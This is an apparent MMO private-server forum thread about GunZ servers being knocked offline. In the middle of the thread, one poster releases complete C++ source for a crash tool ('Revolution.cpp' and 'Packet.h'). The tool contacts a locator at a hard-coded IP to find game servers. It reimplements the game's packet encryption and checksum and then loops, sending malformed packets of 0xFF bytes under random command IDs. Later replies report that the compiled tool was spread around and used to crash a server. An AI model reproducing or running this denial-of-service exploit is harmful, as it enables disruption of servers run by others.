Skilled Illusionist
- Joined
- Mar 13, 2009
- Messages
- 319
- Reaction score
- 8
Is it? cuz my gunz is down, Darkgunz is down, ??
Join our community of MMO enthusiasts and game developers! By registering, you'll gain access to discussions on the latest developments in MMO server files and collaborate with like-minded individuals. Join us today and unlock the potential of MMO server development!
Join Today!Tsssk tsssk Phail, that's not clean C code. I'm awaiting releases like
"Private Server Destroyer V1.0 by Kyuma"
"Private Server Destroyer V1.0 by Touchwise"
"Private Server Destroyer V1.0 by [fill in a lot of other names]"
Let's sit back and enjoy .
Are you going to release a patch for this version? =S
I don't think so. I'll sit down and see what the future brings. I've heard a lot of "GunZ developers" say they can do it all, so I want to give them a chance to "do it all".
xd!!!!! Next should be SQL Injection amirite?
- Wizkid (L) (F) says (1:39 PM):
*I don't happen to care about GunZ for more than a year now, lol
*I'm just still working on LG because all the other servers are poop, spelled as s - h - i - t.
*leeching right and left
- Wizkid (L) (F) says (1:40 PM):
*then protecting leeched files with MY stuff
*which is a lose - lose situation I didn't signed for.
*in short, I'm not doing a single thing but hanging around once in a while.
*let the leechers provide a solution (inside clue: "real gunz developers").
*signed with xD
You should have started with that, it's the more fun part. Let's make a codecave check on ' in all of those functions! tt1:
Off-topic:
looooooooooooooooooooooooooooooooooooooooooooooooooooooool. I love the patch being 5 lines XD.
Yay, ego is back.
Hi, I don't care about GunZ anymore.
Revolution.cpp
Code:#include <stdio.h> #include <Windows.h> #include "Packet.h" #pragma comment (lib, "WS2_32") typedef struct Host { char szIP[64]; short nPort; }*LPHOST; LPHOST GetHostFromLocator() { WSADATA wsaData; WSAStartup (MAKEWORD (2,2), &wsaData); LPHOST lpHost = new Host(); int nRecv = 0; PCHAR lpBuffer = new char[4096]; SOCKET fd = socket (AF_INET, SOCK_DGRAM, 0); sockaddr_in sockAddr; sockAddr.sin_addr.S_un.S_addr = INADDR_ANY; sockAddr.sin_port = htons (7900); sockAddr.sin_family = AF_INET; sockaddr_in serverAddr; serverAddr.sin_addr.S_un.S_addr = inet_addr ("67.212.81.85"); serverAddr.sin_port = htons (8900); serverAddr.sin_family = AF_INET; int nSize = sizeof(sockaddr); while (true) { sendto (fd, "\x64\x00\x0b\x00\x73\x00\x05\x00\x41\x9c\x00", 11, 0, (sockaddr *)&serverAddr, sizeof(sockaddr)); nRecv = recvfrom (fd , lpBuffer, 40*** 0, (sockaddr *)&serverAddr, &nSize); if (nRecv < 1) { printf ("Failed to connect. Retrying\n"); Sleep (30000); continue; } if (nRecv > 6 && lpBuffer[0] == 100) { in_addr a; memcpy (&a, lpBuffer+23, 4); int port = 0; memcpy (&port, lpBuffer+27, 4); strcpy (lpHost->szIP, inet_ntoa (a)); lpHost->nPort = port; return lpHost; } } return NULL; } int main() { unsigned short packetIDs[] = { 0x144, 0x145, 0x3F3, 0x3F4, 0x44D, 0x4BD, 0x4D1, 0x5AC, 0x57A, 0x52A, 0x522, 0x4C6, 0x584, 0x585, 0x5B6, 0x5DE, 0x6A5, 0x6A6, 0x6B8, 0x6A8, 0x6AA, 0x6b6, 0x70a, 0x70c, 0x178, 0x71E, 0x728, 0x72D, 0x607, 0x610, 0x623, 0x619, 0x61B, 0x770, 0x7E0, 0x7E8, 0x7EA, 0x7EB, 0x803, 0xC1C, 0x177E, 0x17A3, 0x17A6, 0x1FA, 0x5209, 0x520E, 0x17D8, 0x5217, 0x9C42, 0x1F45, 0x1F43, 0x1F44, 0x723 }; SOCKET fd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); sockaddr_in sockAddr; PBYTE lpBuffer; PCHAR lpTemp = "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"; PBYTE lpKey = new BYTE[32]; ZeroMemory (lpKey, 32); while (true) { LPHOST lpHost = GetHostFromLocator(); if (lpHost == NULL) { Sleep (5000); continue; } printf ("Connecting to: %s:%i\n", lpHost->szIP, lpHost->nPort); fd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); sockAddr.sin_addr.S_un.S_addr = inet_addr (lpHost->szIP); sockAddr.sin_family = AF_INET; sockAddr.sin_port = htons (lpHost->nPort); if (connect (fd, (sockaddr *)&sockAddr, sizeof(sockaddr)) == SOCKET_ERROR) { continue; } CPacket* lpPacket = new CPacket (40*** lpKey); unsigned short id = packetIDs[rand() % (sizeof(packetIDs)-1)]; printf ("Crashing with: %X\n", id); lpPacket->MakeCommand (id, 0); lpPacket->WriteData(lpTemp, 64); lpBuffer = lpPacket->FinalizePacket (100); send (fd, (PCHAR)lpBuffer, lpPacket->mSize+8, 0); printf ("Sent Packet.\n"); closesocket (fd); delete lpPacket; Sleep (50); } }
Packet.h
Code:/* ----------------------------------------- File: Packet.h Usage: Contains the full packet class for reading / writing to the initial buffer. Author: Phail -----------------------------------------*/ class CPacket { public: unsigned char *mData; unsigned char mKey[32]; short mSize; unsigned char *BuildKey(char *pPacket) { byte Xor[] = { 0x57, 0x02,0x5B,0x04,0x34,0x06,0x01,0x08,0x37,0x0A,0x12,0x69,0x41,0x38,0x0F,0x78 }; byte mBytes[] = { 0x37,0x04,0x5D,0x2E,0x43,0x38,0x49,0x53,0x50,0x05,0x13,0xC9,0x28,0xA4,0x4D,0x05 }; //GameNao! unsigned int szTmp = 0,szTmp2 = 0,szTmp3 = 0; memcpy(mKey,pPacket+12,4); memcpy(mKey+4,pPacket,12); memcpy(mKey+16,mBytes,16); for(int i=0; i<4; ++i) { memcpy(&szTmp,Xor+(i*4),4); memcpy(&szTmp2,mKey+(i*4),4); szTmp3 = szTmp ^ szTmp2; memcpy(mKey+(i*4),&szTmp3,4); } return (unsigned char *)mKey; } void Encrypt(unsigned char *szBuffer, int iStart, int iLength) { for(int i=0; i < iLength; ++i) { unsigned short a = szBuffer[iStart+i]; a ^=mKey[i%32]; a <<= 3; byte b = (byte)(a >> 8); b |= (byte)(a & 0xFF); b ^= 0xF0; szBuffer[iStart + i] = (byte)b; } } void Decrypt(unsigned char *szBuffer, int iStart, int iLength) { for (int i = 0; i < iLength; ++i) { byte a = szBuffer[iStart + i]; a ^= 0x0F0; byte b = (byte)(7 & a); b <<= 5; a >>= 3; b = (byte)(a | b); szBuffer[iStart+i] = (byte)(b ^ mKey[i % 32]); } } unsigned short Checksum(unsigned char *szBuffer, int iStart, int iLength) { unsigned int uiSum = (unsigned int)(szBuffer[iStart] + szBuffer[iStart+1] + szBuffer[iStart+2] + szBuffer[iStart+3]),uiSum2=0,uiSum3=0,uiSum4=0; for(int i=6; i < iLength; ++i) uiSum2 += szBuffer[i]; uiSum3 = uiSum2 - uiSum; uiSum4 = uiSum3 >> 0x10; uiSum3 += uiSum4; return (unsigned short)uiSum3; } void WriteData(void *pData, short pLength) { char cZero = 0x00; if(pData == 0) { for(int i=0; i < pLength; i++) { memcpy(mData+mSize,&cZero,1); mSize++; } } else { memcpy(mData+mSize,pData,pLength); mSize += pLength; } } void WriteString(char *szBuffer) { short wSize = strlen(szBuffer)+1; WriteData(&wSize,2); WriteData(szBuffer,wSize); } short ReadShort() { short s = 0; memcpy(&s,mData+mSize,2); mSize+=2; return s; } char *ReadString() { short wSize = ReadShort(); char *szString = (char *)malloc(wSize); memset(szString,0,wSize); memcpy(szString,mData+mSize,wSize); mSize+=wSize; return szString; } byte ReadByte() { byte out = mData[mSize]; mSize++; return out; } long ReadLong() { long out = 0; memcpy(&out,mData+mSize,4); mSize+=4; return out; } byte *ReadArray(short iSize) { byte *bArray = new byte[iSize]; memset(bArray,0,iSize); memcpy(bArray,mData+mSize,iSize); mSize+=iSize; return bArray; } short GetLen(int iLast) { short wOut = 0; for(int i=mSize; i < iLast; i++,wOut++) { if(mData[i] == 0){ wOut++; break; } } return wOut; } void SkipByte(short wSize) { mSize+=wSize; } void SetPos(short pVal) { mSize = pVal; } void WriteShort(short pIn) { memcpy((mData+mSize),&pIn,2); mSize+=2; } void MakeCommand(short wCommand,byte val) { char cPacketId = val; memcpy(mData,&wCommand,2); memcpy(mData+2,&cPacketId,1); mSize += 3; } unsigned char *FinalizePacket(unsigned short wVersion) { unsigned short wLen = mSize + 8; unsigned short wLen2 = mSize+2; unsigned short wChecksum = 0; unsigned char *szPacket = new unsigned char[wLen]; byte bZero[] = {0x0,0x0}; memset(szPacket,0,wLen); memcpy(szPacket,&wVersion,2); memcpy(szPacket+2,&wLen,2); if(wVersion == 0x65)Encrypt(szPacket,2,2); memcpy(szPacket+4,&bZero,2); memcpy(szPacket+6,&wLen2,2); memcpy(szPacket+8,mData,mSize); if(wVersion == 0x65)Encrypt(szPacket,6,mSize+2); wChecksum = Checksum(szPacket,0,wLen); memcpy(szPacket+4,&wChecksum,2); return szPacket; } CPacket(int pLen,unsigned char pKey[32]) { mData = (unsigned char *)malloc(pLen); memset(mData,0,pLen); mSize = 0; memcpy(mKey,pKey,32); } CPacket(unsigned char *pDecrypted, short pStart, short pSize) { mData = (unsigned char *)malloc(pSize); memset(mData,0,pSize); memcpy(mData,pDecrypted,pSize); mSize = pStart; } CPacket(unsigned char pKey[32]) { memcpy(mKey,pKey,32); } CPacket(){} ~CPacket() { free((void *)mData); mSize = 0; } };
What I'm seeing here is Theo being an butt pretending he's too badass to care, and you being too cool to do something about it.No, you are incorrect. You don't seem to get my point. Too bad.
What I'm seeing here is Theo being an butt pretending he's too badass to care, and you being too cool to do something about it.
Oh great.
Did you give a compiled version to NicK?
Or was he smart enough to compile it himself?
He's using it to crash my server. ._________.
WooAf: Connecting to: a.b.c.d:e | Crashing with: 1F45
WooAf: Please fix the 1F45 packet.
And then he spammed the compiled version all over my shoutbox and forums.
And I got no idea why.
Great. This is so gay. >____>
That's #1.
I'm #1. "That's #1." Even better. .___________.
And when you are talking about ego...
:
When I'm talking about ego... o.o
I'm an ego-tripper on msn when I get provoked, sometimes.
I don't get what you mean though.
It's a joke which some people will understand and some won't.
Explain.
Is it good to understand it or not?
It's a joke so it's funny to understand it. But, as usually with jokes, there's always a part of humans that don't get the joke.
Let's not go further off-topic and head to bed.